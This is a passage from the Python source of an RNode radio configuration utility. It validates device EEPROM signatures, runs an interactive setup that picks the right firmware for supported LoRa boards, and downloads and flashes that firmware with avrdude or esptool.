                self.serialno = bytes([self.eeprom[ROM.ADDR_SERIAL], self.eeprom[ROM.ADDR_SERIAL+1], self.eeprom[ROM.ADDR_SERIAL+2], self.eeprom[ROM.ADDR_SERIAL+3]])
                self.made = bytes([self.eeprom[ROM.ADDR_MADE], self.eeprom[ROM.ADDR_MADE+1], self.eeprom[ROM.ADDR_MADE+2], self.eeprom[ROM.ADDR_MADE+3]])
                self.checksum = b""

                self.min_freq = models[self.model][0]
                self.max_freq = models[self.model][1]
                self.max_output = models[self.model][2]

                try:
                    self.min_freq = models[self.model][0]
                    self.max_freq = models[self.model][1]
                    self.max_output = models[self.model][2]
                except Exception as e:
                    RNS.log("Exception")
                    RNS.log(str(e))
                    self.min_freq = 0
                    self.max_freq = 0
                    self.max_output = 0

                for i in range(0, 16):
                    self.checksum = self.checksum+bytes([self.eeprom[ROM.ADDR_CHKSUM+i]])

                self.signature = b""
                for i in range(0, 128):
                    self.signature = self.signature+bytes([self.eeprom[ROM.ADDR_SIGNATURE+i]])

                checksummed_info = b"" + bytes([self.product]) + bytes([self.model]) + bytes([self.hw_rev]) + self.serialno + self.made
                digest = hashes.Hash(hashes.MD5(), backend=default_backend())
                digest.update(checksummed_info)
                checksum = digest.finalize()

                if self.checksum != checksum:
                    self.provisioned = False
                    RNS.log("EEPROM checksum mismatch")
                    exit()
                else:
                    RNS.log("EEPROM checksum correct")

                    from cryptography.hazmat.primitives import serialization
                    from cryptography.hazmat.primitives.serialization import load_der_public_key
                    from cryptography.hazmat.primitives.serialization import load_der_private_key
                    from cryptography.hazmat.primitives.asymmetric import padding

                    # Try loading local signing key for
                    # validation of self-signed devices
                    if os.path.isdir("./firmware") and os.path.isfile("./firmware/signing.key"):
                        private_bytes = None
                        try:
                            file = open("./firmware/signing.key", "rb")
                            private_bytes = file.read()
                            file.close()
                        except Exception as e:
                            RNS.log("Could not load local signing key")

                        try:
                            private_key = serialization.load_der_private_key(
                                private_bytes,
                                password=None,
                                backend=default_backend()
                            )
                            public_key = private_key.public_key()
                            public_bytes = public_key.public_bytes(
                                encoding=serialization.Encoding.DER,
                                format=serialization.PublicFormat.SubjectPublicKeyInfo
                            )
                            public_bytes_hex = RNS.hexrep(public_bytes, delimit=False)

                            vendor_keys = []
                            for known in known_keys:
                                vendor_keys.append(known[1])

                            if not public_bytes_hex in vendor_keys:
                                local_key_entry = ["LOCAL", public_bytes_hex]
                                known_keys.append(local_key_entry)
                        except Exception as e:
                            RNS.log("Could not deserialize local signing key")
                            RNS.log(str(e))

                    for known in known_keys:
                        vendor = known[0]
                        public_hexrep = known[1]
                        public_bytes = bytes.fromhex(public_hexrep)
                        public_key = load_der_public_key(public_bytes, backend=default_backend())
                        try:
                            public_key.verify(
                                self.signature,
                                self.checksum,
                                padding.PSS(
                                    mgf=padding.MGF1(hashes.SHA256()),
                                    salt_length=padding.PSS.MAX_LENGTH
                                ),
                                hashes.SHA256())
                            if vendor == "LOCAL":
                                self.locally_signed = True
                            self.signature_valid = True
                            self.vendor = vendor
                        except Exception as e:
                            pass

                    if self.signature_valid:
                        RNS.log("Device signature validated")
                    else:
                        RNS.log("Device signature validation failed")
                        if not squashvw:
                            print(" ")
                            print(" WARNING! This device is NOT verifiable and should NOT be trusted.")
                            print(" Someone could have added privacy-breaking or malicious code to it.")
                            print(" ")
                            print(" Proceed at your own risk and responsibility! If you created this")
                            print(" device yourself, please read the documentation on how to sign your")
                            print(" device to avoid this warning.")
                            print(" ")
                            print(" Always use a firmware downloaded as binaries or compiled from source")
                            print(" from one of the following locations:")
                            print(" ")
                            print(" https://unsigned.io/rnode")
                            print(" https://github.com/markqvist/rnode_firmware")
                            print(" ")
                            print(" You can reflash and bootstrap this device to a verifiable state")
                            print(" by using this utility. It is recommended to do so NOW!")
                            print(" ")
                            print(" To initialise this device to a verifiable state, please run:")
                            print(" ")
                            print(" rnodeconf "+str(self.serial.name)+" --autoinstall")
                            print("")

                if self.eeprom[ROM.ADDR_CONF_OK] == ROM.CONF_OK_BYTE:
                    self.configured = True
                    self.conf_sf = self.eeprom[ROM.ADDR_CONF_SF]
                    self.conf_cr = self.eeprom[ROM.ADDR_CONF_CR]
                    self.conf_txpower = self.eeprom[ROM.ADDR_CONF_TXP]
                    self.conf_frequency = self.eeprom[ROM.ADDR_CONF_FREQ] << 24 | self.eeprom[ROM.ADDR_CONF_FREQ+1] << 16 | self.eeprom[ROM.ADDR_CONF_FREQ+2] << 8 | self.eeprom[ROM.ADDR_CONF_FREQ+3]
                    self.conf_bandwidth = self.eeprom[ROM.ADDR_CONF_BW] << 24 | self.eeprom[ROM.ADDR_CONF_BW+1] << 16 | self.eeprom[ROM.ADDR_CONF_BW+2] << 8 | self.eeprom[ROM.ADDR_CONF_BW+3]
                else:
                    self.configured = False
            else:
                self.provisioned = False
        except Exception as e:
            self.provisioned = False
            RNS.log("Invalid EEPROM data, could not parse device EEPROM.")

    def device_probe(self):
        sleep(2.5)
        self.detect()
        sleep(0.1)
        if self.detected == True:
            RNS.log("Device connected")
            RNS.log("Current firmware version: "+self.version)
            return True
        else:
            raise IOError("Got invalid response while detecting device")

firmware_version_url = "https://unsigned.io/firmware/latest/?variant="
def download_firmware(fw_filename):
    try:
        urlretrieve(firmware_update_url+fw_filename, "update/"+fw_filename)
        try:
            urlretrieve(firmware_version_url+fw_filename, "update/"+fw_filename+".version")
        except Exception as e:
            pass
    except Exception as e:
        RNS.log("Could not download required firmware file. The contained exception was:")
        RNS.log(str(e))
        exit()

def rnode_open_serial(port):
    import serial
    return serial.Serial(
        port=port,
        baudrate=rnode_baudrate,
        bytesize=8,
        parity=serial.PARITY_NONE,
        stopbits=1,
        xonxoff=False,
        rtscts=False,
        timeout=0,
        inter_byte_timeout=None,
        write_timeout=None,
        dsrdtr=False
    )

def main():
    global mapped_product, mapped_model, fw_filename

    try:
        if not util.find_spec("serial"):
            raise ImportError("Serial module could not be found")
    except ImportError:
        print("")
        print("RNode Config Utility needs pyserial to work.")
        print("You can install it with: pip3 install pyserial")
        print("")
        exit()

    try:
        if not util.find_spec("cryptography"):
            raise ImportError("Cryptography module could not be found")
    except ImportError:
        print("")
        print("RNode Config Utility needs the cryptography module to work.")
        print("You can install it with: pip3 install cryptography")
        print("")
        exit()

    import serial
    from serial.tools import list_ports

    try:
        parser = argparse.ArgumentParser(description="RNode Configuration and firmware utility. This program allows you to change various settings and startup modes of RNode. It can also install, flash and update the firmware on supported devices.")
        parser.add_argument("-i", "--info", action="store_true", help="Show device info")
        parser.add_argument("-a", "--autoinstall", action="store_true", help="Automatic installation on various supported devices")
        parser.add_argument("-u", "--update", action="store_true", help="Update firmware to the latest version")
        parser.add_argument("--nocheck", action="store_true", help="Don't check for firmware updates online, use existing local files if possible")
        parser.add_argument("-N", "--normal", action="store_true", help="Switch device to normal mode")
        parser.add_argument("-T", "--tnc", action="store_true", help="Switch device to TNC mode")
        parser.add_argument("--freq", action="store", metavar="Hz", type=int, default=None, help="Frequency in Hz for TNC mode")
        parser.add_argument("--bw", action="store", metavar="Hz", type=int, default=None, help="Bandwidth in Hz for TNC mode")
        parser.add_argument("--txp", action="store", metavar="dBm", type=int, default=None, help="TX power in dBm for TNC mode")
        parser.add_argument("--sf", action="store", metavar="factor", type=int, default=None, help="Spreading factor for TNC mode (7 - 12)")
        parser.add_argument("--cr", action="store", metavar="rate", type=int, default=None, help="Coding rate for TNC mode (5 - 8)")
        parser.add_argument("-b", "--backup", action="store_true", help="Backup EEPROM to file")
        parser.add_argument("-d", "--dump", action="store_true", help="Dump EEPROM to console")
        parser.add_argument("--eepromwipe", action="store_true", help="Unlock and wipe EEPROM")
        parser.add_argument("--version", action="store_true", help="Print program version and exit")
        parser.add_argument("-f", "--flash", action="store_true", help=argparse.SUPPRESS)  # Flash firmware and bootstrap EEPROM
        parser.add_argument("-r", "--rom", action="store_true", help=argparse.SUPPRESS)  # Bootstrap EEPROM without flashing firmware
        parser.add_argument("-k", "--key", action="store_true", help=argparse.SUPPRESS)  # Generate a new signing key and exit
        parser.add_argument("-p", "--public", action="store_true", help=argparse.SUPPRESS)  # Display public part of signing key
        parser.add_argument("--platform", action="store", metavar="platform", type=str, default=None, help=argparse.SUPPRESS)  # Platform specification for device bootstrap
        parser.add_argument("--product", action="store", metavar="product", type=str, default=None, help=argparse.SUPPRESS)  # Product specification for device bootstrap
        parser.add_argument("--model", action="store", metavar="model", type=str, default=None, help=argparse.SUPPRESS)  # Model code for device bootstrap
        parser.add_argument("--hwrev", action="store", metavar="revision", type=int, default=None, help=argparse.SUPPRESS)  # Hardware revision for device bootstrap
        parser.add_argument("port", nargs="?", default=None, help="serial port where RNode is attached", type=str)
        args = parser.parse_args()

        def print_donation_block():
            print("  Ethereum : "+eth_addr)
            print("  Bitcoin  : "+btc_addr)
            print("  Monero   : "+xmr_addr)
            print("  Ko-Fi    : https://ko-fi.com/markqvist")
            print("")
            print("  Info     : https://unsigned.io/")
            print("  Code     : https://github.com/markqvist")

        if args.version:
            print("rnodeconf "+program_version)
            exit(0)

        if args.public or args.key or args.flash or args.rom or args.autoinstall:
            from cryptography.hazmat.primitives import hashes
            from cryptography.hazmat.backends import default_backend
            from cryptography.hazmat.primitives import serialization
            from cryptography.hazmat.primitives.serialization import load_der_public_key
            from cryptography.hazmat.primitives.serialization import load_der_private_key
            from cryptography.hazmat.primitives.asymmetric import rsa
            from cryptography.hazmat.primitives.asymmetric import padding

        if args.autoinstall:
            print("\nHello!\n\nThis guide will help you install the RNode firmware on supported")
            print("and homebrew devices. Please connect the device you wish to set\nup now. Hit enter when it is connected.")
            input()

            global squashvw
            squashvw = True

            selected_port = None
            if not args.port:
                ports = list_ports.comports()
                portlist = []
                for port in ports:
                    portlist.insert(0, port)

                pi = 1
                print("Detected serial ports:")
                for port in portlist:
                    print("  ["+str(pi)+"] "+str(port.device)+" ("+str(port.product)+", "+str(port.serial_number)+")")
                    pi += 1

                print("\nWhat serial port is your device connected to? ", end="")
                try:
                    c_port = int(input())
                    if c_port < 1 or c_port > len(ports):
                        raise ValueError()
                    selected_port = portlist[c_port-1]
                except Exception as e:
                    print("That port does not exist, exiting now.")
                    exit()

                if selected_port == None:
                    print("Could not select port, exiting now.")
                    exit()

                port_path = selected_port.device
                port_product = selected_port.product
                port_serialno = selected_port.serial_number
                print("\nOk, using device on "+str(port_path)+" ("+str(port_product)+", "+str(port_serialno)+")")
            else:
                ports = list_ports.comports()
                for port in ports:
                    if port.device == args.port:
                        selected_port = port

                if selected_port == None:
                    print("Could not find specified port "+str(args.port)+", exiting now")
                    exit()

                port_path = selected_port.device
                port_product = selected_port.product
                port_serialno = selected_port.serial_number
                print("\nUsing device on "+str(port_path))

            print("\nProbing device...")
            try:
                rnode_serial = rnode_open_serial(port_path)
            except Exception as e:
                RNS.log("Could not open the specified serial port. The contained exception was:")
                RNS.log(str(e))
                exit()

            rnode = RNode(rnode_serial)
            thread = threading.Thread(target=rnode.readLoop)
            thread.setDaemon(True)
            thread.start()

            try:
                rnode.device_probe()
            except Exception as e:
                RNS.log("No answer from device")

            if rnode.detected:
                RNS.log("Trying to read EEPROM...")
                rnode.download_eeprom()

            if rnode.provisioned and rnode.signature_valid:
                print("\nThis device is already installed and provisioned. No further action will")
                print("be taken. If you wish to completely reinstall this device, you must first")
                print("wipe the current EEPROM. See the help for more info.\n\nExiting now.")
                exit()

            if rnode.detected:
                print("\nThe device seems to have an RNode firmware installed, but it was not")
                print("provisioned correctly, or it is corrupt. We are going to reinstall the")
                print("correct firmware and provision it.")
            else:
                print("\nIt looks like this is a fresh device with no RNode firmware.")

            print("What kind of device is this?\n")
            print("[1] Original RNode")
            print("[2] Homebrew RNode")
            print("[3] LilyGO T-Beam")
            print("[4] LilyGO LoRa32 v2.0")
            print("[5] LilyGO LoRa32 v2.1")
            print("\n? ", end="")

            selected_product = None
            try:
                c_dev = int(input())
                if c_dev < 1 or c_dev > 5:
                    raise ValueError()
                elif c_dev == 1:
                    selected_product = ROM.PRODUCT_RNODE
                elif c_dev == 2:
                    selected_product = ROM.PRODUCT_HMBRW
                    print("")
                    print("---------------------------------------------------------------------------")
                    print("Important! Using RNode firmware on homebrew devices should currently be")
                    print("considered experimental. 
It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 3: selected_product = ROM.PRODUCT_TBEAM print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on T-Beam devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 4: selected_product = ROM.PRODUCT_T32_20 print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on LoRa32 devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() elif c_dev == 5: selected_product = ROM.PRODUCT_T32_21 print("") print("---------------------------------------------------------------------------") print("Important! Using RNode firmware on LoRa32 devices should currently be") print("considered experimental. It is not intended for production or critical use.") print("The currently supplied firmware is provided AS-IS as a courtesey to those") print("who would like to experiment with it. If you want any degree of reliability,") print("please use an actual RNode from unsigned.io. Hit enter to continue.") print("---------------------------------------------------------------------------") input() except Exception as e: print("That device type does not exist, exiting now.") exit() selected_platform = None selected_model = None selected_mcu = None if selected_product == ROM.PRODUCT_HMBRW: selected_model = ROM.MODEL_FF print("\nWhat kind of microcontroller is your board based on?\n") print("[1] AVR ATmega1284P") print("[2] AVR ATmega2560") print("[3] Espressif Systems ESP32") print("\n? ", end="") try: c_mcu = int(input()) if c_mcu < 1 or c_mcu > 3: raise ValueError() elif c_mcu == 1: selected_mcu = ROM.MCU_1284P selected_platform = ROM.PLATFORM_AVR elif c_mcu == 2: selected_mcu = ROM.MCU_2560 selected_platform = ROM.PLATFORM_AVR elif c_mcu == 3: selected_mcu = ROM.MCU_ESP32 selected_platform = ROM.PLATFORM_ESP32 selected_model = ROM.MODEL_FF except Exception as e: print("That MCU type does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_RNODE: selected_mcu = ROM.MCU_1284P print("\nWhat model is this RNode?\n") print("[1] RNode 410 - 525 MHz") print("[2] RNode 820 - 1020 MHz") print("\n? 
", end="") try: c_model = int(input()) if c_model < 1 or c_model > 2: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_A4 selected_platform = ROM.PLATFORM_AVR elif c_model == 2: selected_model = ROM.MODEL_A9 selected_platform = ROM.PLATFORM_AVR except Exception as e: print("That model does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_TBEAM: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this T-Beam for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_E4 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_E9 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_T32_20: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this LoRa32 for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_B3 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_B8 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() elif selected_product == ROM.PRODUCT_T32_21: selected_mcu = ROM.MCU_ESP32 print("\nWhat band is this LoRa32 for?\n") print("[1] 433 MHz") print("[2] 868 MHz") print("[3] 915 MHz") print("[4] 923 MHz") print("\n? ", end="") try: c_model = int(input()) if c_model < 1 or c_model > 4: raise ValueError() elif c_model == 1: selected_model = ROM.MODEL_B4 selected_platform = ROM.PLATFORM_ESP32 elif c_model > 1: selected_model = ROM.MODEL_B9 selected_platform = ROM.PLATFORM_ESP32 except Exception as e: print("That band does not exist, exiting now.") exit() if selected_model != ROM.MODEL_FF: fw_filename = models[selected_model][4] else: if selected_platform == ROM.PLATFORM_AVR: if selected_mcu == ROM.MCU_1284P: fw_filename = "rnode_firmware_latest.hex" elif selected_mcu == ROM.MCU_2560: fw_filename = "rnode_firmware_latest_m2560.hex" elif selected_platform == ROM.PLATFORM_ESP32: fw_filename = None print("\nWhat kind of ESP32 board is this?\n") print("[1] Adafruit Feather ESP32 (HUZZAH32)") print("[2] Generic ESP32 board") print("\n? ", end="") try: c_eboard = int(input()) if c_eboard < 1 or c_eboard > 2: raise ValueError() elif c_eboard == 1: fw_filename = "rnode_firmware_latest_featheresp32.zip" elif c_eboard == 2: fw_filename = "rnode_firmware_latest_esp32_generic.zip" except Exception as e: print("That ESP32 board does not exist, exiting now.") exit() if fw_filename == None: print("") print("Sorry, no firmware for your board currently exists.") print("Help making it a reality by contributing code or by") print("donating to the project.") print("") print_donation_block() print("") exit() print("\nOk, that should be all the information we need. Please confirm the following") print("summary before proceeding. 
In the next step, the device will be flashed and") print("provisioned, so make that you are satisfied with your choices.\n") print("Serial port : "+str(selected_port.device)) print("Device type : "+str(products[selected_product])+" "+str(models[selected_model][3])) print("Platform : "+str(platforms[selected_platform])) print("Device MCU : "+str(mcus[selected_mcu])) print("Firmware file : "+str(fw_filename)) print("\nIs the above correct? [y/N] ", end="") try: c_ok = input().lower() if c_ok != "y": raise ValueError() except Exception as e: print("OK, aborting now.") exit() args.key = True args.port = selected_port.device args.platform = selected_platform args.hwrev = 1 mapped_model = selected_model mapped_product = selected_product args.update = False args.flash = True # TODO: Download firmware file from github here try: RNS.log("Downloading latest frimware from GitHub...") os.makedirs("./update", exist_ok=True) download_firmware(fw_filename) RNS.log("Firmware download completed") except Exception as e: RNS.log("Could not download firmware package") RNS.log("The contained exception was: "+str(e)) exit() rnode.disconnect() if args.public: private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) except Exception as e: RNS.log("Could not deserialize signing key") RNS.log(str(e)) exit() if args.key: RNS.log("Generating a new signing key...") private_key = rsa.generate_private_key( public_exponent=65537, key_size=1024, backend=default_backend() ) private_bytes = private_key.private_bytes( encoding=serialization.Encoding.DER, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) os.makedirs("./firmware", exist_ok=True) if os.path.isdir("./firmware"): if os.path.isfile("./firmware/signing.key"): if not args.autoinstall: RNS.log("Signing key already exists, not overwriting!") RNS.log("Manually delete this key to create a new one.") else: file = open("./firmware/signing.key", "wb") file.write(private_bytes) file.close() if not squashvw: RNS.log("Wrote signing key") RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) else: RNS.log("The firmware directory does not exist, can't write key!") if not args.autoinstall: exit() def get_flasher_call(platform, fw_filename): from shutil import which if platform == "unzip": flasher = "unzip" if which(flasher) is not None: return [flasher, "-o", "./update/"+fw_filename, "-d", "./update/"] else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. 
You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install "+flasher) RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() elif platform == ROM.PLATFORM_AVR: flasher = "avrdude" if which(flasher) is not None: # avrdude -C/home/markqvist/.arduino15/packages/arduino/tools/avrdude/6.3.0-arduino17/etc/avrdude.conf -q -q -V -patmega2560 -cwiring -P/dev/ttyACM0 -b115200 -D -Uflash:w:/tmp/arduino-sketch-0E260F46C421A84A7CBAD48E859C8E64/RNode_Firmware.ino.hex:i # avrdude -q -q -V -patmega2560 -cwiring -P/dev/ttyACM0 -b115200 -D -Uflash:w:/tmp/arduino-sketch-0E260F46C421A84A7CBAD48E859C8E64/RNode_Firmware.ino.hex:i if fw_filename == "rnode_firmware_latest.hex": return [flasher, "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:update/"+fw_filename+":i"] elif fw_filename == "rnode_firmware_latest_m2560.hex": return [flasher, "-P", args.port, "-p", "atmega2560", "-c", "wiring", "-D", "-b", "115200", "-U", "flash:w:update/"+fw_filename] else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install avrdude") RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() elif platform == ROM.PLATFORM_ESP32: flasher = "./update/esptool.py" if which(flasher) is not None: if fw_filename == "rnode_firmware_latest_tbeam.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_tbeam.boot_app0", "0x1000", "./update/rnode_firmware_latest_tbeam.bootloader", "0x10000", "./update/rnode_firmware_latest_tbeam.bin", "0x8000", "./update/rnode_firmware_latest_tbeam.partitions", ] elif fw_filename == "rnode_firmware_latest_lora32v20.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_lora32v20.boot_app0", "0x1000", "./update/rnode_firmware_latest_lora32v20.bootloader", "0x10000", "./update/rnode_firmware_latest_lora32v20.bin", "0x8000", "./update/rnode_firmware_latest_lora32v20.partitions", ] elif fw_filename == "rnode_firmware_latest_lora32v21.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_lora32v21.boot_app0", "0x1000", "./update/rnode_firmware_latest_lora32v21.bootloader", "0x10000", "./update/rnode_firmware_latest_lora32v21.bin", "0x8000", "./update/rnode_firmware_latest_lora32v21.partitions", ] elif fw_filename == "rnode_firmware_latest_featheresp32.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_featheresp32.boot_app0", "0x1000", "./update/rnode_firmware_latest_featheresp32.bootloader", "0x10000", 
"./update/rnode_firmware_latest_featheresp32.bin", "0x8000", "./update/rnode_firmware_latest_featheresp32.partitions", ] elif fw_filename == "rnode_firmware_latest_esp32_generic.zip": return [ flasher, "--chip", "esp32", "--port", args.port, "--baud", "921600", "--before", "default_reset", "--after", "hard_reset", "write_flash", "-z", "--flash_mode", "dio", "--flash_freq", "80m", "--flash_size", "4MB", "0xe000", "./update/rnode_firmware_latest_esp32_generic.boot_app0", "0x1000", "./update/rnode_firmware_latest_esp32_generic.bootloader", "0x10000", "./update/rnode_firmware_latest_esp32_generic.bin", "0x8000", "./update/rnode_firmware_latest_esp32_generic.partitions", ] else: RNS.log("No flasher available for this board, cannot install firmware.") else: RNS.log("") RNS.log("You do not currently have the \""+flasher+"\" program installed on your system.") RNS.log("Unfortunately, that means we can't proceed, since it is needed to flash your") RNS.log("board. You can install it via your package manager, for example:") RNS.log("") RNS.log(" sudo apt install esptool") RNS.log("") RNS.log("Please install \""+flasher+"\" and try again.") exit() if args.port: if args.flash: from subprocess import call if fw_filename == None: fw_filename = "rnode_firmware.hex" if args.platform == None: args.platform = ROM.PLATFORM_AVR if args.autoinstall: fw_src = "./update/" else: import shutil shutil.copy("./firmware/"+fw_filename, "./update/"+fw_filename) fw_src = "./update/" if os.path.isfile(fw_src+fw_filename): try: if fw_filename.endswith(".zip"): RNS.log("Extracting firmware...") unzip_status = call(get_flasher_call("unzip", fw_filename)) if unzip_status == 0: RNS.log("Firmware extracted") else: RNS.log("Could not extract firmware from downloaded zip file") exit() RNS.log("Flashing RNode firmware to device on "+args.port) from subprocess import call flash_status = call(get_flasher_call(args.platform, fw_filename)) if flash_status == 0: RNS.log("Done flashing") args.rom = True if args.platform == ROM.PLATFORM_ESP32: RNS.log("Waiting for ESP32 reset...") time.sleep(5) else: exit() except Exception as e: RNS.log("Error while flashing") RNS.log(str(e)) else: RNS.log("Firmware file not found") exit() RNS.log("Opening serial port "+args.port+"...") try: rnode_port = args.port rnode_serial = rnode_open_serial(rnode_port) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. Is a valid firmware installed?") print(e) exit() if rnode.detected: if rnode.platform == None or rnode.mcu == None: rnode.platform = ROM.PLATFORM_AVR rnode.mcu = ROM.MCU_1284P if args.eepromwipe: RNS.log("WARNING: EEPROM is being wiped! 
Power down device NOW if you do not want this!") rnode.wipe_eeprom() exit() RNS.log("Reading EEPROM...") rnode.download_eeprom() if rnode.provisioned: if rnode.model != ROM.MODEL_FF: fw_filename = models[rnode.model][4] else: if rnode.platform == ROM.PLATFORM_AVR: if rnode.mcu == ROM.MCU_1284P: fw_filename = "rnode_firmware_latest.hex" elif rnode.mcu == ROM.MCU_2560: fw_filename = "rnode_firmware_latest_m2560.hex" elif rnode.platform == ROM.PLATFORM_ESP32: if rnode.board == ROM.BOARD_HUZZAH32: fw_filename = "rnode_firmware_latest_featheresp32.zip" elif rnode.board == ROM.BOARD_GENERIC_ESP32: fw_filename = "rnode_firmware_latest_esp32_generic.zip" else: fw_filename = None if args.update: RNS.log("ERROR: No firmware found for this board. Cannot update.") exit() if args.update: rnode.disconnect() from subprocess import call if not args.nocheck: try: RNS.log("Downloading latest firmware from GitHub...") os.makedirs("./update", exist_ok=True) download_firmware(fw_filename) RNS.log("Firmware download completed") if fw_filename.endswith(".zip"): RNS.log("Extracting firmware...") unzip_status = call(get_flasher_call("unzip", fw_filename)) if unzip_status == 0: RNS.log("Firmware extracted") else: RNS.log("Could not extract firmware from downloaded zip file") exit() except Exception as e: RNS.log("Could not download firmware update") RNS.log("The contained exception was: "+str(e)) exit() else: RNS.log("Skipping online check, using local firmware file: "+"./update/"+fw_filename) if os.path.isfile("./update/"+fw_filename): try: args.info = False RNS.log("Updating RNode firmware for device on "+args.port) flash_status = call(get_flasher_call(rnode.platform, fw_filename)) if flash_status == 0: RNS.log("Flashing new firmware completed") RNS.log("Opening serial port "+args.port+"...") try: rnode_port = args.port rnode_serial = rnode_open_serial(rnode_port) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. 
Is a valid firmware installed?") print(e) exit() if rnode.detected: if rnode.platform == None or rnode.mcu == None: rnode.platform = ROM.PLATFORM_AVR rnode.mcu = ROM.MCU_1284P RNS.log("Reading EEPROM...") rnode.download_eeprom() if rnode.provisioned: if rnode.model != ROM.MODEL_FF: fw_filename = models[rnode.model][4] else: fw_filename = None args.info = True if args.info: RNS.log("") RNS.log("Firmware update completed successfully") else: RNS.log("An error occurred while flashing the new firmware, exiting now.") exit() except Exception as e: RNS.log("Error while updating firmware") RNS.log(str(e)) else: RNS.log("Firmware update file not found") exit() if args.dump: RNS.log("EEPROM contents:") RNS.log(RNS.hexrep(rnode.eeprom)) exit() if args.backup: try: timestamp = time.time() filename = str(time.strftime("%Y-%m-%d_%H-%M-%S")) path = "./eeprom/"+filename+".eeprom" file = open(path, "wb") file.write(rnode.eeprom) file.close() RNS.log("EEPROM backup written to: "+path) except Exception as e: RNS.log("EEPROM was successfully downloaded from device,") RNS.log("but file could not be written to disk.") exit() if args.info: if rnode.provisioned: timestamp = struct.unpack(">I", rnode.made)[0] timestring = datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S") sigstring = "Unverified" if rnode.signature_valid: if rnode.locally_signed: sigstring = "Validated - Local signature" else: sigstring = "Genuine board, vendor is "+rnode.vendor if rnode.board != None: board_string = ":"+bytes([rnode.board]).hex() else: board_string = "" RNS.log("") RNS.log("Device info:") RNS.log("\tProduct : "+products[rnode.product]+" "+models[rnode.model][3]+" ("+bytes([rnode.product]).hex()+":"+bytes([rnode.model]).hex()+board_string+")") RNS.log("\tDevice signature : "+sigstring) RNS.log("\tFirmware version : "+rnode.version) RNS.log("\tHardware revision : 